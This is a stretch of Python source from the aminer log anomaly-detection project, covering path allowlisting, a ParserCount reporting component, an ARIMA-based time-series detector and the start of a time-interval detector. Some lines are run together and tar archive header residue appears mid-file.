        self.event_count_vector = copy.deepcopy(self.event_count_matrix[0])
        self.reset_event_count_vector()

    def _check_event_source(self, event_type, extra_data, extra_data_msg):
        """Reject events not emitted by this detector and unsupported extra listing data."""
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if extra_data is not None:
            logging.getLogger(DEBUG_LOG_NAME).error(extra_data_msg)
            raise Exception(extra_data_msg)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """Allowlist an event generated by this source using the information emitted when generating the event.

        The given path is added to constraint_list.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        self._check_event_source(event_type, allowlisting_data, "Allowlisting data not understood by this detector")
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f"Allowlisted path {event_data} in {event_type}."

    def blocklist_event(self, event_type, event_data, blocklisting_data):
        """Blocklist an event generated by this source using the information emitted when generating the event.

        The given path is added to ignore_list.
        @return a message with information about blocklisting
        @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
        """
        self._check_event_source(event_type, blocklisting_data, "Blocklisting data not understood by this detector")
        if event_data not in self.ignore_list:
            self.ignore_list.append(event_data)
        return f"Blocklisted path {event_data} in {event_type}."

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        @param component_name the name of the component which is printed in the log line.
        """
        # Both statistics levels emit the same line for this detector.
        if STAT_LEVEL in (1, 2):
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully in %d time windows in the last 60 minutes.",
                component_name, self.log_success, self.log_total, self.log_windows)
        self.log_success = 0
        self.log_total = 0
        self.log_windows = 0


"""This component counts occurring combinations of values and periodically sends the results as a report.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
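You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import time
import logging
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface

current_processed_lines_str = "CurrentProcessedLines"
total_processed_lines_str = "TotalProcessedLines"


class ParserCount(AtomHandlerInterface, TimeTriggeredComponentInterface):
    """This class creates a counter for path value combinations."""

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, report_interval=60, target_label_list=None,
                 split_reports_flag=False, log_resource_ignore_list=None):
        """Initialize the ParserCount component.

        @param aminer_config configuration from analysis_context.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
               are considered for value range generation. When empty, the first path of each atom's match dictionary is counted.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param report_interval delay in seconds before reporting.
        @param target_label_list a list of labels for the target_path_list. This list must have the same size as target_path_list.
        @param split_reports_flag if true every path produces an own report, otherwise one report for all paths is produced.
        @param log_resource_ignore_list resource names whose atoms are skipped without being counted.
        @raises ValueError when labels are given without paths or their number does not match the number of paths.
        """
        # avoid "defined outside init" issue
        self.log_success, self.log_total = [None]*2
        super().__init__(
            mutable_default_args=["target_path_list", "log_resource_ignore_list"], aminer_config=aminer_config,
            target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, report_interval=report_interval,
            target_label_list=target_label_list, split_reports_flag=split_reports_flag, log_resource_ignore_list=log_resource_ignore_list
        )
        self.count_dict = {}
        self.next_report_time = None
        if (self.target_path_list is None or self.target_path_list == []) and (
                self.target_label_list is not None and self.target_label_list != []):
            msg = "Target labels cannot be used without specifying target paths."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if self.target_label_list is not None and len(self.target_path_list) != len(self.target_label_list):
            msg = "Every path must have a target label if target labels are used."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        for target_path in self.target_path_list:
            self.count_dict[self._label_for(target_path)] = {current_processed_lines_str: 0, total_processed_lines_str: 0}

    def _label_for(self, target_path):
        """Return the key under which target_path is counted: its label when labels are configured, else the path itself."""
        if self.target_label_list:
            return self.target_label_list[self.target_path_list.index(target_path)]
        return target_path

    def _is_ignored_resource(self, log_atom):
        """Return True when the atom's resource name is on the configured ignore list."""
        if not self.log_resource_ignore_list:
            return False
        return log_atom.source.resource_name.decode() in self.log_resource_ignore_list

    def _increment(self, key):
        """Bump both the per-report and the total counter of key."""
        self.count_dict[key][current_processed_lines_str] += 1
        self.count_dict[key][total_processed_lines_str] += 1

    def receive_atom(self, log_atom):
        """Receive a log atom from a source.

        @param log_atom the parsed log atom to count.
        @return False when the atom's resource is ignored, True otherwise.
        """
        if self._is_ignored_resource(log_atom):
            return False
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        success_flag = False
        for target_path in self.target_path_list:
            if match_dict.get(target_path) is None:
                continue
            success_flag = True
            self._increment(self._label_for(target_path))
        if not self.target_path_list:
            # Without configured paths the first path of the match dictionary identifies the counter. An atom with an empty
            # match dictionary has nothing to count; it must not raise StopIteration here.
            path = next(iter(match_dict), None)
            if path is not None:
                self.count_dict.setdefault(path, {current_processed_lines_str: 0, total_processed_lines_str: 0})
                self._increment(path)
                # A counted atom is a successfully processed one, so the statistics agree with the report.
                success_flag = True
        if self.next_report_time is None:
            self.next_report_time = time.time() + self.report_interval
        if success_flag:
            self.log_success += 1
        return True

    def do_timer(self, trigger_time):
        """Check whether a report is due and send it.

        @param trigger_time the time the timer fired.
        @return the number of seconds until the next report check.
        """
        if self.next_report_time is None:
            return self.report_interval
        delta = self.next_report_time - trigger_time
        if delta <= 0:
            self.send_report()
            delta = self.report_interval
            self.next_report_time = trigger_time + delta
        return delta

    def _emit_report(self, output_string, status_info, report_time):
        """Send one "Count report" event covering the last report_interval seconds to all event handlers."""
        event_data = {"StatusInfo": status_info, "FromTime": report_time - self.report_interval, "ToTime": report_time}
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f"Analysis.{self.__class__.__name__}", "Count report", [output_string], event_data, None, self)

    def send_report(self):
        """Send a report to the event handlers and reset the per-report counters.

        With split_reports_flag set, one event per counted path is sent; otherwise a single event lists all paths.
        """
        header = f"Parsed paths in the last {self.report_interval} seconds:"
        report_time = time.time()
        if not self.split_reports_flag:
            lines = [f"\t{key}: {counts}" for key, counts in self.count_dict.items()]
            self._emit_report("\n".join([header] + lines), self.count_dict, report_time)
        else:
            for key, counts in self.count_dict.items():
                status_info = {key: {current_processed_lines_str: counts[current_processed_lines_str],
                                     total_processed_lines_str: counts[total_processed_lines_str]}}
                self._emit_report(f"{header}\n\t{key}: {counts}", status_info, report_time)
        for counts in self.count_dict.values():
            counts[current_processed_lines_str] = 0
        logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__)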
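"""This module is a detector which uses a tsa-arima model to analyze the values of the paths in target_path_list.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import logging
import math
import re
import numpy as np
import statsmodels
import statsmodels.api as sm
from aminer import AminerConfig
from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, \
    DEFAULT_LOG_LINE_PREFIX
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface
from aminer.util import PersistenceUtil
from scipy import stats, version


def _scipy_version_tuple():
    """Return the leading numeric components of the installed scipy version as a tuple of ints.

    Components after the first non-numeric one (e.g. "dev0" or "rc1") are ignored instead of raising ValueError.
    """
    parts = []
    for part in version.full_version.split("."):
        digits = re.match(r"\d+", part)
        if digits is None:
            break
        parts.append(int(digits.group()))
    return tuple(parts)


# scipy.stats.binomtest is available from scipy 1.7 on and replaces the older binom_test. The version is compared as a tuple so
# that a larger major version with a small minor version (e.g. 2.0) is not mistaken for a pre-1.7 release.
if _scipy_version_tuple() >= (1, 7):
    binomial_test = stats.binomtest
else:
    binomial_test = stats.binom_test


class PathArimaDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface):
    """This class is used for an arima time series analysis of the values of the paths in target_path_list."""

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id="Default", target_path_list=None,
                 output_logline=True, learn_mode=False, num_init=50, force_period_length=False, set_period_length=10, alpha=0.05,
                 alpha_bt=0.05, num_results_bt=15, num_min_time_history=20, num_max_time_history=30, num_periods_tsa_ini=20,
                 stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param event_type_detector used to track the number of events in the time windows.
        @param persistence_id name of persistence file.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their
               combined occurrences. When no paths are specified, the events given by the full path list are analyzed.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param learn_mode specifies whether new frequency measurements override ground truth frequencies.
        @param num_init number of lines processed before the period length is calculated.
        @param force_period_length states if the period length is calculated through the ACF, or if the period length is forced to
               be set to set_period_length.
        @param set_period_length states how long the period length is if force_period_length is set to True.
        @param alpha significance level of the estimated values.
        @param alpha_bt significance level for the bt test.
        @param num_results_bt number of results which are used in the binomial test.
        @param num_min_time_history number of lines processed before the period length is calculated.
        @param num_max_time_history maximum number of values of the time_history.
        @param num_periods_tsa_ini number of periods used to initialize the Arima-model.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list resource names whose atoms are skipped without being analyzed.
        @raises ValueError when the event type detector does not save values or saves too few of them.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        super().__init__(
            mutable_default_args=["target_path_list", "log_resource_ignore_list"], aminer_config=aminer_config,
            anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id,
            target_path_list=target_path_list, output_logline=output_logline, learn_mode=learn_mode, num_init=num_init,
            force_period_length=force_period_length, set_period_length=set_period_length, alpha=alpha, alpha_bt=alpha_bt,
            num_results_bt=num_results_bt, num_min_time_history=num_min_time_history, num_max_time_history=num_max_time_history,
            num_periods_tsa_ini=num_periods_tsa_ini, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list
        )
        # Add the PathArimaDetector to the list of the modules, which use the event_type_detector.
        self.event_type_detector.add_following_modules(self)
        # The detector reads its time series from the values the ETD keeps, so the ETD must save them and keep enough of them.
        required_values = self.num_periods_tsa_ini * int(self.num_init / 2)
        if not self.event_type_detector.save_values:
            msg = "ETD.save_values must be true to properly use the PathArimaDetector."
            logging.getLogger(DEBUG_LOG_NAME).warning(msg)
            raise ValueError(msg)
        if self.event_type_detector.min_num_vals < required_values:
            msg = "ETD.min_num_vals must be greater than num_periods_tsa_ini * int(num_init/2)"
            logging.getLogger(DEBUG_LOG_NAME).warning(msg)
            raise ValueError(msg)
        if self.event_type_detector.max_num_vals < required_values + 500:
            msg = "ETD.max_num_vals must be greater than num_periods_tsa_ini * int(num_init/2) + 500"
            logging.getLogger(DEBUG_LOG_NAME).warning(msg)
            raise ValueError(msg)
        # List of the indices of the target_paths in the ETD
        self.target_path_index_list = []
        # List of the period_lengths
        self.period_length_list = []
        # List of the single arima_models (statsmodels)
        self.arima_models = []
        # List of the observed values and the predictions of the TSAArima
        self.prediction_history = []
        # List of the results if the value was in the limits of the one step predictions
        self.result_list = []
        # Minimal number of successes for the binomial test in the last num_results_bt results
        self.bt_min_suc = self.bt_min_successes(self.num_results_bt, self.alpha, self.alpha_bt)
        # Loads the persistence
        self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.load_persistence_data()

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted.

        @param trigger_time the time the timer fired.
        @return the number of seconds until the next persistence check.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = trigger_time + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage."""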
persistence_data = [self.target_path_index_list, self.period_length_list, self.prediction_history] PersistenceUtil.store_json(self.persistence_file_name, persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.target_path_index_list = persistence_data[0] self.period_length_list = persistence_data[1] self.prediction_history = persistence_data[2] def receive_atom(self, log_atom): """Receive a parsed atom and the information about the parser match. Tests if the event type includes paths of target_path_list and. analyzes their values with an TSA Arima model. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time event_index = self.event_type_detector.current_index if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Check if enough log lines have appeared to calculate the period length, initialize the arima model, or make a prediction if (len(self.period_length_list) <= event_index or self.period_length_list[event_index] is None) and\ len(self.event_type_detector.values[self.event_type_detector.current_index][0]) >= self.num_init: # Extend the list of the 
period_lengths and target_path_index if necessary if len(self.period_length_list) <= event_index: self.period_length_list += [None for _ in range(len(self.period_length_list), event_index + 2)] self.target_path_index_list += [None for _ in range(len(self.target_path_index_list), event_index + 2)] # Add all paths to the target_path_list if they are included in the ET and solely consist of floats self.target_path_index_list[event_index] = [] for target_path in self.target_path_list: if target_path in self.event_type_detector.variable_key_list[event_index]: var_index = self.event_type_detector.variable_key_list[event_index].index(target_path) if all(type(val) is float for val in self.event_type_detector.values[event_index][var_index]): self.target_path_index_list[event_index].append(var_index) # Calculate the period_length of the current event types values counts = [self.event_type_detector.values[event_index][var_index] for var_index in self.target_path_index_list[event_index]] self.calculate_period_length(event_index, counts, log_atom) # Try to initialize the arima model self.test_num_appearance(event_index, log_atom) elif len(self.period_length_list) > event_index and self.period_length_list[event_index] is not None: # Try to initialize or make a prediction with the arima model self.test_num_appearance(event_index, log_atom) return True def calculate_period_length(self, event_index, counts, log_atom): """Returns a list of the period length, if no period was found the value is set to -1.""" if self.force_period_length: # Check if the period length should be forced self.period_length_list[event_index] = [self.set_period_length for _ in counts] else: # Calculate the period lengths with the auto correlation function self.period_length_list[event_index] = [None for _ in counts] for target_path_index, data in enumerate(counts): if data is not None: # Apply the autocorrelation function to the data of the single target_paths. 
corr = list(map(abs, sm.tsa.acf(data, nlags=len(data), fft=True))) corr = np.array(corr) min_lag = -1 # Find the first local minimum for i in range(1, len(corr)-1): if corr[i] == min(corr[i-1: i+2]): min_lag = i break # Find the highest peak and set the time-step as the index + lag if min_lag != -1: highest_peak_index = np.argmax(corr[min_lag:]) self.period_length_list[event_index][target_path_index] = int(highest_peak_index + min_lag) # Print a message of the length of the time steps message = f"Calculated the periods for the event {self.event_type_detector.get_event_type(event_index)}: " \ f"{self.period_length_list[event_index]}" affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) def test_num_appearance(self, event_index, log_atom): """This function makes a one-step prediction and raises an alert if the count do not match the expected appearance.""" # Return, if not TSA should be calculated for this ET if self.period_length_list[event_index] and all(period is None for period in self.period_length_list[event_index]): return # Append the lists for the arima models if it is too short if len(self.arima_models) <= event_index: self.arima_models += [None for _ in range(event_index + 1 - len(self.arima_models))] self.result_list += [None for _ in range(event_index + 1 - len(self.result_list))] if len(self.prediction_history) <= event_index: self.prediction_history += [None for _ in range(event_index + 1 - len(self.prediction_history))] # Initialize the lists for the arima models for this ET if self.arima_models[event_index] is None: self.arima_models[event_index] = [None for _ in range(len(self.target_path_index_list[event_index]))] self.result_list[event_index] = [[] for _ in range(len(self.target_path_index_list[event_index]))] if self.prediction_history[event_index] is None: self.prediction_history[event_index] = [[[], [], []] for _ in range(len(self.target_path_index_list[event_index]))] # Check if 
the new values are floats if any(not self.event_type_detector.check_variables[event_index][var_index] or not isinstance(self.event_type_detector.values[event_index][var_index][-1], float) for var_index in self.target_path_index_list[event_index]): delete_indices = [count_index for count_index, var_index in enumerate(self.target_path_index_list[event_index]) if not self.event_type_detector.check_variables[event_index][var_index] or not isinstance(self.event_type_detector.values[event_index][var_index][-1], float)] delete_indices.sort(reverse=True) for count_index in delete_indices: # Remove the entries of the lists if len(self.target_path_index_list) > event_index and len(self.target_path_index_list[event_index]) > count_index: self.target_path_index_list[event_index] = self.target_path_index_list[event_index][:count_index] +\ self.target_path_index_list[event_index][count_index + 1:] if len(self.period_length_list) > event_index and len(self.period_length_list[event_index]) > count_index: self.period_length_list[event_index] = self.period_length_list[event_index][:count_index] +\ self.period_length_list[event_index][count_index + 1:] if len(self.arima_models) > event_index and len(self.arima_models[event_index]) > count_index: self.arima_models[event_index] = self.arima_models[event_index][:count_index] +\ self.arima_models[event_index][count_index + 1:] if len(self.prediction_history) > event_index and len(self.prediction_history[event_index]) > count_index: self.prediction_history[event_index] = self.prediction_history[event_index][:count_index] +\ self.prediction_history[event_index][count_index + 1:] if len(self.result_list) > event_index and len(self.result_list[event_index]) > count_index: self.result_list[event_index] = self.result_list[event_index][:count_index] +\ self.result_list[event_index][count_index + 1:] message = "Disabled the TSA for the target paths %s of event %s" % ( [self.event_type_detector.variable_key_list[event_index][count_index] for 
count_index in delete_indices], self.event_type_detector.get_event_type(event_index)) affected_path = [self.event_type_detector.variable_key_list[event_index][count_index] for count_index in delete_indices] self.print(message, log_atom, affected_path) # Initialize and update the arima_model if possible for count_index, var_index in enumerate(self.target_path_index_list[event_index]): # Initialize the arima_model if possible if self.learn_mode and self.arima_models[event_index][count_index] is None: if self.period_length_list[event_index][count_index] is not None: # Add the current value to the lists self.prediction_history[event_index][count_index][0].append(0) self.prediction_history[event_index][count_index][1].append(self.event_type_detector.values[event_index][var_index][-1]) self.prediction_history[event_index][count_index][2].append(0) # Check if enough values have been stored to initialize the arima_model if len(self.event_type_detector.values[event_index][var_index]) >= self.num_periods_tsa_ini *\ self.period_length_list[event_index][count_index]: message = f"Initializing the TSA for the event {self.event_type_detector.get_event_type(event_index)} and " \ f"targetpath {self.event_type_detector.variable_key_list[event_index][count_index]}" affected_path = self.event_type_detector.variable_key_list[event_index][count_index] self.print(message, log_atom, affected_path) # Add the arima_model to the list try: model = statsmodels.tsa.arima.model.ARIMA( self.event_type_detector.values[event_index][var_index][ -self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]:], order=(self.period_length_list[event_index][count_index], 0, 0), seasonal_order=(0, 0, 0, self.period_length_list[event_index][count_index])) self.arima_models[event_index][count_index] = model.fit() except Exception: self.arima_models[event_index][count_index] = None if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: 
self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Make a one-step prediction with the new values elif self.arima_models[event_index][count_index] is not None: count = self.event_type_detector.values[event_index][var_index][-1] # Add the prediction to the lists lower_limit, upper_limit = self.one_step_prediction(event_index, count_index) self.prediction_history[event_index][count_index][0].append(lower_limit) self.prediction_history[event_index][count_index][1].append(count) self.prediction_history[event_index][count_index][2].append(upper_limit) # Shorten the lists if necessary if len(self.prediction_history[event_index][count_index][0]) > self.num_max_time_history: self.prediction_history[event_index][count_index][0] = self.prediction_history[event_index][count_index][0][ -self.num_min_time_history:] self.prediction_history[event_index][count_index][1] = self.prediction_history[event_index][count_index][1][ -self.num_min_time_history:] self.prediction_history[event_index][count_index][2] = self.prediction_history[event_index][count_index][2][ -self.num_min_time_history:] else: # Test if count is in boundaries if count < lower_limit or count > upper_limit: message = f"Event: {self.event_type_detector.get_event_type(event_index)}, Path: " \ f"{self.event_type_detector.variable_key_list[event_index][var_index]}, Lower: {lower_limit}, Count: " \ f"{count}, Upper: {upper_limit}" affected_path = self.event_type_detector.variable_key_list[event_index][var_index] if count < lower_limit: confidence = (lower_limit - count) / (upper_limit - count) else: confidence = (count - upper_limit) / (count - lower_limit) self.print(message, log_atom, affected_path, confidence=confidence) self.result_list[event_index][count_index].append(0) else: self.result_list[event_index][count_index].append(1) # Reduce the number of entries in the time history if it gets too large if len(self.result_list[event_index][count_index]) >= 
2 * max( self.num_results_bt, self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]): self.result_list[event_index][count_index] = self.result_list[event_index][count_index][-max( self.num_results_bt, self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]):] # Check if the too few or many successes are in the last section of the test history and discard the model # Else update the model for the next step if self.learn_mode and ( sum(self.result_list[event_index][count_index][-self.num_results_bt:]) + max(0, self.num_results_bt - len(self.result_list[event_index][count_index])) < self.bt_min_suc or binomial_test(sum(self.result_list[event_index][count_index][ -self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]:]), n=self.num_periods_tsa_ini * self.period_length_list[event_index][count_index], p=(1-self.alpha), alternative="greater") < self.alpha_bt): message = f"Discard the TSA model for the event {self.event_type_detector.get_event_type(event_index)} and path " \ f"{self.event_type_detector.variable_key_list[event_index][var_index]}" affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print(message, log_atom, affected_path) # Discard the trained model and reset the result_list self.arima_models[event_index][count_index] = None self.result_list[event_index][count_index] = [] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) else: # Update the model self.arima_models[event_index][count_index] = self.arima_models[event_index][count_index].append([count]) def one_step_prediction(self, event_index, count_index): """Make a one-step prediction with the Arima model.""" prediction = self.arima_models[event_index][count_index].get_forecast(1) prediction = prediction.conf_int(alpha=self.alpha) # return to the order: 
lower_limit, upper_limit return prediction[0][0], prediction[0][1] @staticmethod def bt_min_successes(num_bt, p, alpha): """Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return i return num_bt def print(self, message, log_atom, affected_path, confidence=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = "" if self.output_logline: sorted_log_lines = [original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": affected_path} event_data = {"AnalysisComponent": analysis_component, "TotalRecords": self.event_type_detector.total_records, "TypeInfo": {}} if self.event_type_detector.id_path_list: event_data["IDpaths"] = self.event_type_detector.id_path_list event_data["IDvalues"] = list(self.event_type_detector.id_path_list_tuples[self.event_type_detector.current_index]) if confidence is not None: event_data["TypeInfo"]["Confidence"] = confidence for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, log_atom, self) 
PathValueTimeIntervalDetector.py000066400000000000000000000620501500476301700372330ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for time intervals of the appearance of log lines. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer import AminerConfig from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, CONFIG_KEY_LOG_LINE_PREFIX, \ DEFAULT_LOG_LINE_PREFIX from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class PathValueTimeIntervalDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class analyzes the time intervals of the appearance of log_atoms. The considered time intervals depend on the combination of values in the target_paths of target_path_list. 
""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list, persistence_id="Default", allow_missing_values_flag=True, ignore_list=None, output_logline=True, learn_mode=False, time_period_length=86400, max_time_diff=360, num_reduce_time_list=10, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the pathes from paths does not refer to an existing parsed data object. @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param time_period_length length of the time window for which the appearances of log lines are identified with each other. Value of 86400 specifies a day and 604800 a week. @param max_time_diff maximal time difference in seconds for new times. If the difference of the new time to all previous times is greater than max_time_diff the new time is considered an anomaly. @param num_reduce_time_list number of new time entries appended to the time list, before the list is being reduced. 
@param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["ignore_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, target_path_list=target_path_list, allow_missing_values_flag=allow_missing_values_flag, ignore_list=ignore_list, output_logline=output_logline, learn_mode=learn_mode, time_period_length=time_period_length, max_time_diff=max_time_diff, num_reduce_time_list=num_reduce_time_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) if not self.target_path_list: msg = "target_path_list must not be empty or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # Keys: Tuple of values of the paths of target_path_list, Entries: List of all appeared times to the tuple. self.appeared_time_list = {} # Keys: Tuple of values of the paths of target_path_list, Entries: Counter of appended times to the time list since last reduction. self.counter_reduce_time_intervals = {} # Loads the persistence self.persistence_id = persistence_id self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) # Imports the persistence self.load_persistence_data() def receive_atom(self, log_atom): """Analyze if the time of the log_atom appeared in the time interval of a previously appeared times. 
